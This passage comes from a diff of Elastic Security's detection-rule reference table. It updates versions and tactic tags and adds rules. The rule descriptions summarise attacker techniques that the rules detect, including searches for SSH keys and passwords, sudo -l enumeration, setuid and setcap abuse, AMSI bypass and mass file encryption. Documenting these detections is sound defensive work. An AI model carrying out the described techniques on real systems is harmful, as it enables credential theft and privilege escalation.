AntiVirus or Host Firewall details. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Discovery], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |107 +|<<security-software-discovery-using-wmic, Security Software Discovery using WMIC>> |Identifies the use of Windows Management Instrumentation Command (WMIC) to discover certain System Security Settings such as AntiVirus or Host Firewall details. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Discovery], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |108 -|<<security-software-discovery-via-grep, Security Software Discovery via Grep>> |Identifies the use of the grep command to discover known third-party macOS and Linux security tools, such as Antivirus or Host Firewall details. |[Domain: Endpoint], [OS: macOS], [OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |105 +|<<security-software-discovery-via-grep, Security Software Discovery via Grep>> |Identifies the use of the grep command to discover known third-party macOS and Linux security tools, such as Antivirus or Host Firewall details. |[Domain: Endpoint], [OS: macOS], [OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |106 -|<<sensitive-files-compression, Sensitive Files Compression>> |Identifies the use of a compression utility to collect known files containing sensitive information, such as credentials and system configurations. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Collection], [Tactic: Credential Access], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 +|<<sensitive-files-compression, Sensitive Files Compression>> |Identifies the use of a compression utility to collect known files containing sensitive information, such as credentials and system configurations. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Collection], [Tactic: Credential Access], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.6.0 |206 |<<sensitive-files-compression-inside-a-container, Sensitive Files Compression Inside A Container>> |Identifies the use of a compression utility to collect known files containing sensitive information, such as credentials and system configurations inside a container. |[Data Source: Elastic Defend for Containers], [Domain: Container], [OS: Linux], [Use Case: Threat Detection], [Tactic: Collection], [Tactic: Credential Access] |8.8.0 |2 |<<sensitive-keys-or-passwords-searched-for-inside-a-container, Sensitive Keys Or Passwords Searched For Inside A Container>> |This rule detects the use of system search utilities like grep and find to search for private SSH keys or passwords inside a container. Unauthorized access to these sensitive files could lead to further compromise of the container environment or facilitate a container breakout to the underlying host machine. |[Data Source: Elastic Defend for Containers], [Domain: Container], [OS: Linux], [Use Case: Threat Detection], [Tactic: Credential Access] |8.8.0 |2 -|<<sensitive-privilege-seenabledelegationprivilege-assigned-to-a-user, Sensitive Privilege SeEnableDelegationPrivilege assigned to a User>> |Identifies the assignment of the SeEnableDelegationPrivilege sensitive "user right" to a user. The SeEnableDelegationPrivilege "user right" enables computer and user accounts to be trusted for delegation. Attackers can abuse this right to compromise Active Directory accounts and elevate their privileges. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Active Directory], [Resources: Investigation Guide], [Use Case: Active Directory Monitoring] |8.3.0 |107 +|<<sensitive-privilege-seenabledelegationprivilege-assigned-to-a-user, Sensitive Privilege SeEnableDelegationPrivilege assigned to a User>> |Identifies the assignment of the SeEnableDelegationPrivilege sensitive "user right" to a user. The SeEnableDelegationPrivilege "user right" enables computer and user accounts to be trusted for delegation. Attackers can abuse this right to compromise Active Directory accounts and elevate their privileges. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Tactic: Persistence], [Data Source: Active Directory], [Resources: Investigation Guide], [Use Case: Active Directory Monitoring] |8.3.0 |108 |<<service-command-lateral-movement, Service Command Lateral Movement>> |Identifies use of sc.exe to create, modify, or start services on remote hosts. This could be indicative of adversary lateral movement but will be noisy if commonly done by admins. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Defend] |8.3.0 |105 -|<<service-control-spawned-via-script-interpreter, Service Control Spawned via Script Interpreter>> |Identifies Service Control (sc.exe) spawning from script interpreter processes to create, modify, or start services. This can potentially indicate an attempt to elevate privileges or maintain persistence. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |106 +|<<service-control-spawned-via-script-interpreter, Service Control Spawned via Script Interpreter>> |Identifies Service Control (sc.exe) spawning from script interpreter processes to create, modify, or start services. This can potentially indicate an attempt to elevate privileges or maintain persistence. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Tactic: Defense Evasion], [Tactic: Execution], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |107 |<<service-creation-via-local-kerberos-authentication, Service Creation via Local Kerberos Authentication>> |Identifies a suspicious local successful logon event where the Logon Package is Kerberos, the remote address is set to localhost, followed by a sevice creation from the same LogonId. This may indicate an attempt to leverage a Kerberos relay attack variant that can be used to elevate privilege locally from a domain joined user to local System privileges. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Tactic: Credential Access], [Use Case: Active Directory Monitoring], [Data Source: Active Directory] |8.3.0 |105 @@ -1474,11 +1526,13 @@ and their rule type is `machine_learning`. |<<service-path-modification-via-sc-exe, Service Path Modification via sc.exe>> |Identifies attempts to modify a service path setting using sc.exe. Attackers may attempt to modify existing services for persistence or privilege escalation. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |1 +|<<setcap-setuid-setgid-capability-set, Setcap setuid/setgid Capability Set>> |This rule monitors for the addition of the cap_setuid+ep or cap_setgid+ep capabilities via setcap. Setuid (Set User ID) and setgid (Set Group ID) are Unix-like OS features that enable processes to run with elevated privileges, based on the file owner or group. Threat actors can exploit these attributes to achieve persistence by creating malicious binaries, allowing them to maintain control over a compromised system with elevated permissions. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Defend] |8.3.0 |1 + |<<setuid-setgid-bit-set-via-chmod, Setuid / Setgid Bit Set via chmod>> |An adversary may add the setuid or setgid bit to a file or directory in order to run a file with the privileges of the owning user or group. An adversary can take advantage of this to either do a shell escape or exploit a vulnerability in an application with the setuid or setgid bit to get code running in a different user’s context. Additionally, adversaries can use this mechanism on their own malware to make sure they're able to execute in elevated contexts in the future. |[Domain: Endpoint], [OS: Linux], [OS: macOS], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Elastic Defend] |8.3.0 |103 |<<sharepoint-malware-file-upload, SharePoint Malware File Upload>> |Identifies the occurence of files uploaded to SharePoint being detected as Malware by the file scanning engine. Attackers can use File Sharing and Organization Repositories to spread laterally within the company and amplify their access. Users can inadvertently share these files without knowing their maliciousness, giving adversaries opportunities to gain initial access to other endpoints in the environment. |[Domain: Cloud], [Data Source: Microsoft 365], [Tactic: Lateral Movement] |8.3.0 |102 -|<<shared-object-created-or-changed-by-previously-unknown-process, Shared Object Created or Changed by Previously Unknown Process>> |This rule monitors the creation of shared object files by previously unknown processes. The creation of a shared object file involves compiling code into a dynamically linked library that can be loaded by other programs at runtime. While this process is typically used for legitimate purposes, malicious actors can leverage shared object files to execute unauthorized code, inject malicious functionality into legitimate processes, or bypass security controls. This allows malware to persist on the system, evade detection, and potentially compromise the integrity and confidentiality of the affected system and its data. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.6.0 |3 +|<<shared-object-created-or-changed-by-previously-unknown-process, Shared Object Created or Changed by Previously Unknown Process>> |This rule monitors the creation of shared object files by previously unknown processes. The creation of a shared object file involves compiling code into a dynamically linked library that can be loaded by other programs at runtime. While this process is typically used for legitimate purposes, malicious actors can leverage shared object files to execute unauthorized code, inject malicious functionality into legitimate processes, or bypass security controls. This allows malware to persist on the system, evade detection, and potentially compromise the integrity and confidentiality of the affected system and its data. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.6.0 |4 |<<shell-execution-via-apple-scripting, Shell Execution via Apple Scripting>> |Identifies the execution of the shell process (sh) via scripting (JXA or AppleScript). Adversaries may use the doShellScript functionality in JXA or do shell script in AppleScript to execute system commands. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Defend] |8.3.0 |104 @@ -1488,9 +1542,13 @@ and their rule type is `machine_learning`. |<<softwareupdate-preferences-modification, SoftwareUpdate Preferences Modification>> |Identifies changes to the SoftwareUpdate preferences using the built-in defaults command. Adversaries may abuse this in an attempt to disable security updates. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |104 -|<<solarwinds-process-disabling-services-via-registry, SolarWinds Process Disabling Services via Registry>> |Identifies a SolarWinds binary modifying the start type of a service to be disabled. An adversary may abuse this technique to manipulate relevant security services. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 +|<<solarwinds-process-disabling-services-via-registry, SolarWinds Process Disabling Services via Registry>> |Identifies a SolarWinds binary modifying the start type of a service to be disabled. An adversary may abuse this technique to manipulate relevant security services. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Initial Access], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 + +|<<spike-in-aws-error-messages, Spike in AWS Error Messages>> |A machine learning job detected a significant spike in the rate of a particular error in the CloudTrail messages. Spikes in error messages may accompany attempts at privilege escalation, lateral movement, or discovery. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Rule Type: ML], [Rule Type: Machine Learning], [Resources: Investigation Guide] |8.9.0 |208 -|<<spike-in-aws-error-messages, Spike in AWS Error Messages>> |A machine learning job detected a significant spike in the rate of a particular error in the CloudTrail messages. Spikes in error messages may accompany attempts at privilege escalation, lateral movement, or discovery. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Rule Type: ML], [Rule Type: Machine Learning], [Resources: Investigation Guide] |8.3.0 |107 +|<<spike-in-bytes-sent-to-an-external-device, Spike in Bytes Sent to an External Device>> |A machine learning job has detected high bytes of data written to an external device. In a typical operational setting, there is usually a predictable pattern or a certain range of data that is written to external devices. An unusually large amount of data being written is anomalous and can signal illicit data copying or transfer activities. |[Use Case: Data Exfiltration Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Exfiltration] |8.9.0 |1 + +|<<spike-in-bytes-sent-to-an-external-device-via-airdrop, Spike in Bytes Sent to an External Device via Airdrop>> |A machine learning job has detected high bytes of data written to an external device via Airdrop. In a typical operational setting, there is usually a predictable pattern or a certain range of data that is written to external devices. An unusually large amount of data being written is anomalous and can signal illicit data copying or transfer activities. |[Use Case: Data Exfiltration Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Exfiltration] |8.9.0 |1 |<<spike-in-failed-logon-events, Spike in Failed Logon Events>> |A machine learning job found an unusually large spike in authentication failure events. This can be due to password spraying, user enumeration or brute force activity and may be a precursor to account takeover or credentialed access. |[Use Case: Identity and Access Audit], [Use Case: Threat Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Credential Access], [Resources: Investigation Guide] |8.3.0 |104 @@ -1512,7 +1570,7 @@ and their rule type is `machine_learning`. |<<spike-in-successful-logon-events-from-a-source-ip, Spike in Successful Logon Events from a Source IP>> |A machine learning job found an unusually large spike in successful authentication events from a particular source IP address. This can be due to password spraying, user enumeration or brute force activity. |[Use Case: Identity and Access Audit], [Use Case: Threat Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Credential Access], [Tactic: Defense Evasion], [Resources: Investigation Guide] |8.3.0 |104 -|<<startup-folder-persistence-via-unsigned-process, Startup Folder Persistence via Unsigned Process>> |Identifies files written or modified in the startup folder by unsigned processes. Adversaries may abuse this technique to maintain persistence in an environment. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |107 +|<<startup-folder-persistence-via-unsigned-process, Startup Folder Persistence via Unsigned Process>> |Identifies files written or modified in the startup folder by unsigned processes. Adversaries may abuse this technique to maintain persistence in an environment. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |108 |<<startup-persistence-by-a-suspicious-process, Startup Persistence by a Suspicious Process>> |Identifies files written to or modified in the startup folder by commonly abused processes. Adversaries may use this technique to maintain persistence. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 @@ -1522,17 +1580,17 @@ and their rule type is `machine_learning`. |<<sublime-plugin-or-application-script-modification, Sublime Plugin or Application Script Modification>> |Adversaries may create or modify the Sublime application plugins or scripts to execute a malicious payload each time the Sublime application is started. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Defend] |8.3.0 |104 -|<<sudo-command-enumeration-detected, Sudo Command Enumeration Detected>> |This rule monitors for the usage of the sudo -l command, which is used to list the allowed and forbidden commands for the invoking user. Attackers may execute this command to enumerate commands allowed to be executed with sudo permissions, potentially allowing to escalate privileges to root. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Data Source: Elastic Defend] |8.3.0 |2 +|<<sudo-command-enumeration-detected, Sudo Command Enumeration Detected>> |This rule monitors for the usage of the sudo -l command, which is used to list the allowed and forbidden commands for the invoking user. Attackers may execute this command to enumerate commands allowed to be executed with sudo permissions, potentially allowing to escalate privileges to root. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Data Source: Elastic Defend] |8.3.0 |3 |<<sudo-heap-based-buffer-overflow-attempt, Sudo Heap-Based Buffer Overflow Attempt>> |Identifies the attempted use of a heap-based buffer overflow vulnerability for the Sudo binary in Unix-like systems (CVE-2021-3156). Successful exploitation allows an unprivileged user to escalate to the root user. |[Domain: Endpoint], [OS: Linux], [OS: macOS], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Use Case: Vulnerability], [Data Source: Elastic Defend] |8.3.0 |103 -|<<sudoers-file-modification, Sudoers File Modification>> |A sudoers file specifies the commands that users or groups can run and from which terminals. Adversaries can take advantage of these configurations to execute commands as other users or spawn processes with higher privileges. |[Domain: Endpoint], [OS: Linux], [OS: macOS], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Elastic Defend] |8.3.0 |103 +|<<sudoers-file-modification, Sudoers File Modification>> |A sudoers file specifies the commands that users or groups can run and from which terminals. Adversaries can take advantage of these configurations to execute commands as other users or spawn processes with higher privileges. |[Domain: Endpoint], [OS: Linux], [OS: macOS], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Elastic Defend] |8.6.0 |203 -|<<suspicious-net-code-compilation, Suspicious .NET Code Compilation>> |Identifies suspicious .NET code execution. connections. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<suspicious-net-code-compilation, Suspicious .NET Code Compilation>> |Identifies executions of .NET compilers with suspicious parent processes, which can indicate an attacker's attempt to compile code after delivery in order to bypass security mechanisms. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 -|<<suspicious-net-reflection-via-powershell, Suspicious .NET Reflection via PowerShell>> |Detects the use of Reflection.Assembly to load PEs and DLLs in memory in PowerShell scripts. Attackers use this method to load executables and DLLs without writing to the disk, bypassing security solutions. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: PowerShell Logs] |8.3.0 |108 +|<<suspicious-net-reflection-via-powershell, Suspicious .NET Reflection via PowerShell>> |Detects the use of Reflection.Assembly to load PEs and DLLs in memory in PowerShell scripts. Attackers use this method to load executables and DLLs without writing to the disk, bypassing security solutions. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: PowerShell Logs] |8.3.0 |109 -|<<suspicious-activity-reported-by-okta-user, Suspicious Activity Reported by Okta User>> |Detects when a user reports suspicious activity for their Okta account. These events should be investigated, as they can help security teams identify when an adversary is attempting to gain access to their network. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Initial Access] |8.3.0 |104 +|<<suspicious-activity-reported-by-okta-user, Suspicious Activity Reported by Okta User>> |Detects when a user reports suspicious activity for their Okta account. These events should be investigated, as they can help security teams identify when an adversary is attempting to gain access to their network. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Initial Access] |8.10.0 |205 |<<suspicious-antimalware-scan-interface-dll, Suspicious Antimalware Scan Interface DLL>> |Identifies the creation of the Antimalware Scan Interface (AMSI) DLL in an unusual location. This may indicate an attempt to bypass AMSI by loading a rogue AMSI module instead of the legit one. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |6 @@ -1546,77 +1604,79 @@ and their rule type is `machine_learning`. |<<suspicious-child-process-of-adobe-acrobat-reader-update-service, Suspicious Child Process of Adobe Acrobat Reader Update Service>> |Detects attempts to exploit privilege escalation vulnerabilities related to the Adobe Acrobat Reader PrivilegedHelperTool responsible for installing updates. For more information, refer to CVE-2020-9615, CVE-2020-9614 and CVE-2020-9613 and verify that the impacted system is patched. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Use Case: Vulnerability], [Data Source: Elastic Defend] |8.3.0 |104 -|<<suspicious-cmd-execution-via-wmi, Suspicious Cmd Execution via WMI>> |Identifies suspicious command execution (cmd) via Windows Management Instrumentation (WMI) on a remote host. This could be indicative of adversary lateral movement. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<suspicious-cmd-execution-via-wmi, Suspicious Cmd Execution via WMI>> |Identifies suspicious command execution (cmd) via Windows Management Instrumentation (WMI) on a remote host. This could be indicative of adversary lateral movement. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 -|<<suspicious-communication-app-child-process, Suspicious Communication App Child Process>> |Identifies suspicious child processes of communications apps, which can indicate a potential masquerading as the communication app or the exploitation of a vulnerability on the application causing it to execute code. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Rule Type: BBR], [Data Source: Elastic Defend] |8.3.0 |1 +|<<suspicious-communication-app-child-process, Suspicious Communication App Child Process>> |Identifies suspicious child processes of communications apps, which can indicate a potential masquerading as the communication app or the exploitation of a vulnerability on the application causing it to execute code. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Persistence], [Rule Type: BBR], [Data Source: Elastic Defend] |8.3.0 |2 -|<<suspicious-content-extracted-or-decompressed-via-funzip, Suspicious Content Extracted or Decompressed via Funzip>> |Identifies when suspicious content is extracted from a file and subsequently decompressed using the funzip utility. Malware may execute the tail utility using the "-c" option to read a sequence of bytes from the end of a file. The output from tail can be piped to funzip in order to decompress malicious code before it is executed. This behavior is consistent with malware families such as Bundlore. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |2 +|<<suspicious-content-extracted-or-decompressed-via-funzip, Suspicious Content Extracted or Decompressed via Funzip>> |Identifies when suspicious content is extracted from a file and subsequently decompressed using the funzip utility. Malware may execute the tail utility using the "-c" option to read a sequence of bytes from the end of a file. The output from tail can be piped to funzip in order to decompress malicious code before it is executed. This behavior is consistent with malware families such as Bundlore. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |3 |<<suspicious-crontab-creation-or-modification, Suspicious CronTab Creation or Modification>> |Identifies attempts to create or modify a crontab via a process that is not crontab (i.e python, osascript, etc.). This activity should not be highly prevalent and could indicate the use of cron as a persistence mechanism by a threat actor. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Defend] |8.3.0 |104 -|<<suspicious-dll-loaded-for-persistence-or-privilege-escalation, Suspicious DLL Loaded for Persistence or Privilege Escalation>> |Identifies the loading of a non Microsoft signed DLL that is missing on a default Windows install (phantom DLL) or one that can be loaded from a different location by a native Windows process. This may be abused to persist or elevate privileges via privileged file write vulnerabilities. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Privilege Escalation], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 +|<<suspicious-dll-loaded-for-persistence-or-privilege-escalation, Suspicious DLL Loaded for Persistence or Privilege Escalation>> |Identifies the loading of a non Microsoft signed DLL that is missing on a default Windows install (phantom DLL) or one that can be loaded from a different location by a native Windows process. This may be abused to persist or elevate privileges via privileged file write vulnerabilities. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Privilege Escalation], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |108 -|<<suspicious-data-encryption-via-openssl-utility, Suspicious Data Encryption via OpenSSL Utility>> |Identifies when the openssl command-line utility is used to encrypt multiple files on a host within a short time window. Adversaries may encrypt data on a single or multiple systems in order to disrupt the availability of their target's data and may attempt to hold the organization's data to ransom for the purposes of extortion. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Impact], [Data Source: Elastic Defend] |8.3.0 |2 +|<<suspicious-data-encryption-via-openssl-utility, Suspicious Data Encryption via OpenSSL Utility>> |Identifies when the openssl command-line utility is used to encrypt multiple files on a host within a short time window. Adversaries may encrypt data on a single or multiple systems in order to disrupt the availability of their target's data and may attempt to hold the organization's data to ransom for the purposes of extortion. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Impact], [Data Source: Elastic Defend] |8.3.0 |3 |<<suspicious-emond-child-process, Suspicious Emond Child Process>> |Identifies the execution of a suspicious child process of the Event Monitor Daemon (emond). Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Defend] |8.3.0 |104 -|<<suspicious-endpoint-security-parent-process, Suspicious Endpoint Security Parent Process>> |A suspicious Endpoint Security parent process was detected. This may indicate a process hollowing or other form of code injection. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<suspicious-endpoint-security-parent-process, Suspicious Endpoint Security Parent Process>> |A suspicious Endpoint Security parent process was detected. This may indicate a process hollowing or other form of code injection. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 + +|<<suspicious-execution-from-a-mounted-device, Suspicious Execution from a Mounted Device>> |Identifies when a script interpreter or signed binary is launched via a non-standard working directory. An attacker may use this technique to evade defenses. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Execution], [Data Source: Elastic Defend] |8.3.0 |105 -|<<suspicious-execution-from-a-mounted-device, Suspicious Execution from a Mounted Device>> |Identifies when a script interpreter or signed binary is launched via a non-standard working directory. An attacker may use this technique to evade defenses. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |104 +|<<suspicious-execution-via-msiexec, Suspicious Execution via MSIEXEC>> |Identifies suspicious execution of the built-in Windows Installer, msiexec.exe, to install a package from usual paths or parent process. Adversaries may abuse msiexec.exe to launch malicious local MSI files. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Rule Type: BBR], [Data Source: Elastic Defend] |8.3.0 |1 |<<suspicious-execution-via-microsoft-office-add-ins, Suspicious Execution via Microsoft Office Add-Ins>> |Identifies execution of common Microsoft Office applications to launch an Office Add-In from a suspicious path or with an unusual parent process. This may indicate an attempt to get initial access via a malicious phishing MS Office Add-In. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Initial Access], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |3 -|<<suspicious-execution-via-scheduled-task, Suspicious Execution via Scheduled Task>> |Identifies execution of a suspicious program via scheduled tasks by looking at process lineage and command line usage. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Defend] |8.3.0 |104 +|<<suspicious-execution-via-scheduled-task, Suspicious Execution via Scheduled Task>> |Identifies execution of a suspicious program via scheduled tasks by looking at process lineage and command line usage. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Execution], [Data Source: Elastic Defend] |8.3.0 |105 |<<suspicious-execution-via-windows-subsystem-for-linux, Suspicious Execution via Windows Subsystem for Linux>> |Detects Linux Bash commands from the the Windows Subsystem for Linux. Adversaries may enable and use WSL for Linux to avoid detection. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |4 -|<<suspicious-explorer-child-process, Suspicious Explorer Child Process>> |Identifies a suspicious Windows explorer child process. Explorer.exe can be abused to launch malicious scripts or executables from a trusted parent process. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Initial Access], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 +|<<suspicious-explorer-child-process, Suspicious Explorer Child Process>> |Identifies a suspicious Windows explorer child process. Explorer.exe can be abused to launch malicious scripts or executables from a trusted parent process. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Initial Access], [Tactic: Defense Evasion], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 -|<<suspicious-file-changes-activity-detected, Suspicious File Changes Activity Detected>> |This rule identifies a sequence of 100 file extension rename events within a set of common file paths by the same process in a timespan of 1 second. Ransomware is a type of malware that encrypts a victim's files or systems and demands payment (usually in cryptocurrency) in exchange for the decryption key. One important indicator of a ransomware attack is the mass encryption of the file system, after which a new file extension is added to the file. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Impact], [Data Source: Elastic Defend] |8.3.0 |5 +|<<suspicious-file-changes-activity-detected, Suspicious File Changes Activity Detected>> |This rule identifies a sequence of 100 file extension rename events within a set of common file paths by the same process in a timespan of 1 second. Ransomware is a type of malware that encrypts a victim's files or systems and demands payment (usually in cryptocurrency) in exchange for the decryption key. One important indicator of a ransomware attack is the mass encryption of the file system, after which a new file extension is added to the file. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Impact], [Data Source: Elastic Defend] |8.3.0 |6 -|<<suspicious-file-creation-in-etc-for-persistence, Suspicious File Creation in /etc for Persistence>> |Detects the manual creation of files in specific etc directories, via user root, used by Linux malware to persist and elevate privileges on compromised systems. File creation in these directories should not be entirely common and could indicate a malicious binary or script installing persistence mechanisms for long term access. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Threat: Orbit], [Threat: Lightning Framework], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |108 +|<<suspicious-file-creation-in-etc-for-persistence, Suspicious File Creation in /etc for Persistence>> |Detects the manual creation of files in specific etc directories, via user root, used by Linux malware to persist and elevate privileges on compromised systems. File creation in these directories should not be entirely common and could indicate a malicious binary or script installing persistence mechanisms for long term access. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Threat: Orbit], [Threat: Lightning Framework], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |109 |<<suspicious-html-file-creation, Suspicious HTML File Creation>> |Identifies the execution of a browser process to open an HTML file with high entropy and size. Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Initial Access], [Data Source: Elastic Defend] |8.3.0 |104 |<<suspicious-hidden-child-process-of-launchd, Suspicious Hidden Child Process of Launchd>> |Identifies the execution of a launchd child process with a hidden file. An 